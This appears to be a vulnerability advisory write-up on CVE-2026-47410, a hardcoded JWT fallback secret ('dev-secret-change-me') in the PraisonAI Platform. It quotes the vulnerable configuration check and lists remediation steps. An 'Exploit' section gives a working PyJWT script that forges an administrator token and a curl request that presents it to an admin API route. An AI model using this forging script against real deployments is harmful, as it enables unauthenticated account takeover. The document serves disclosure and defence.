CVE-2026-47410 represents a critical security flaw located within the core authentication architecture of the PraisonAI Platform.
The vulnerability specifically impacts all application versions released prior to version 0.1.4.
At the heart of the issue is an insecure cryptographic key generation and fallback mechanism.
When administrators or users deploy the platform without explicitly configuring the `PLATFORM_JWT_SECRET` environment variable, the system falls back insecurely.
Instead of halting execution, it automatically resorts to a hardcoded literal signing secret.
This hardcoded string value is explicitly defined within the codebase as “dev-secret-change-me”.
The application developers attempted to implement a production safety check to guard against this exact scenario.
However, this safety check evaluates whether the `PLATFORM_ENV` environment variable is unequal to the string “dev”.
Because the system configuration initializes the environment variable to “dev” by default when left unspecified, standard production deployments inherit this dev state.
As a result, standard deployments using default configurations completely bypass the intended production safety warning guard.
Attackers can effortlessly discover this hardcoded secret literal by inspecting public repositories or open-source distribution files.
Armed with the known secret string, a remote attacker can construct arbitrary JSON Web Tokens.
These forged tokens can include custom payload claims such as administrative user IDs and privileged email addresses.
Because the server validates incoming tokens using the predictable default secret, it accepts the cryptographic signature as fully authentic.
This allows malicious actors to impersonate workspace owners or system administrators without requiring any prior authentication credentials.
The attack vector requires zero user interaction and can be executed completely remotely over standard network interfaces.
Because authentication controls are completely bypassed, attackers achieve full account takeover across protected endpoints.
The vulnerability cascades into total compromise of system confidentiality, data integrity, and operational availability.
Consequently, security rating frameworks assign this vulnerability a maximum CVSS v3.1 base score of 9.8 out of 10.
Mitigating this severe risk requires immediate code modification to remove fallback secrets entirely.
Operators must upgrade their installations to version 0.1.4 or higher to enforce secure key management practices.

What Undercode Say:
Analytics and Code Observations:
The analysis of the source code reveals that cryptographic signing routines utilize fallback parameters without strict runtime validation checks.
Reviewing the environment ingestion logic highlights how default variables propagate into production runtime environments if operators omit explicit variable declarations.
Below is an example of the vulnerable configuration check pattern found in the source code:
Vulnerable environment check pattern
jwt_secret = os.environ.get("PLATFORM_JWT_SECRET", "dev-secret-change-me")
platform_env = os.environ.get("PLATFORM_ENV", "dev")
if platform_env != "dev":
if jwt_secret == "dev-secret-change-me":
raise ValueError("Insecure default secret in production!")
To inspect running environments or verify active configuration values via bash command lines, security engineers can execute diagnostic queries:
Check environment variables on the target host container env | grep -E "PLATFORM_JWT_SECRET|PLATFORM_ENV" Test endpoint response headers and token rejection behavior curl -I -X GET "http://localhost:8000/api/v1/workspace"
Exploit: (Educational Purposes!)
The exploitation mechanism involves generating a valid signed JWT using the exposed literal string “dev-secret-change-me” as the HMAC secret key.
Attackers instantiate a python script utilizing standard libraries like `PyJWT` to forge a token with an administrative subject identifier.
import jwt
import datetime
secret = "dev-secret-change-me"
payload = {
"sub": "admin-user-id-001",
"email": "[email protected]",
"exp": datetime.datetime.utcnow() + datetime.timedelta(days=1)
}
forged_token = jwt.encode(payload, secret, algorithm="HS256")
print(f"Forged Token: {forged_token}")
Once the forged token is generated, the attacker injects it into the HTTP Authorization header of requests sent to protected API routes, successfully bypassing all authentication layers.
curl -X GET "http://target-server:8000/api/v1/admin/settings" \ -H "Authorization: Bearer <FORGED_TOKEN_STRING>"
Protection: from this CVE
To protect applications against CVE-2026-47410, immediate remediation steps must be deployed across all infrastructure environments.
1. Upgrade the PraisonAI Platform package to version 0.1.4 or any later patched release immediately.
2. Ensure that `PLATFORM_JWT_SECRET` is explicitly set to a strong, cryptographically secure random string in all deployment configurations.
3. Modify environment deployment pipelines so that missing mandatory secrets trigger hard startup failures rather than falling back to default strings.
4. Implement strict network monitoring and Web Application Firewall (WAF) rules to detect abnormal authentication token patterns or unauthorized administrative API access attempts.
Impact:
The impact of CVE-2026-47410 is critical and far-reaching. Successful exploitation grants malicious actors immediate, unauthenticated remote account takeover capabilities across vulnerable platform deployments. Because attackers can forge valid administrative tokens at will, confidentiality, integrity, and availability are completely compromised. Unauthorized parties can access sensitive enterprise data, modify system settings, execute multi-agent operations maliciously, and disrupt overall platform services without leaving standard authentication audit footprints.
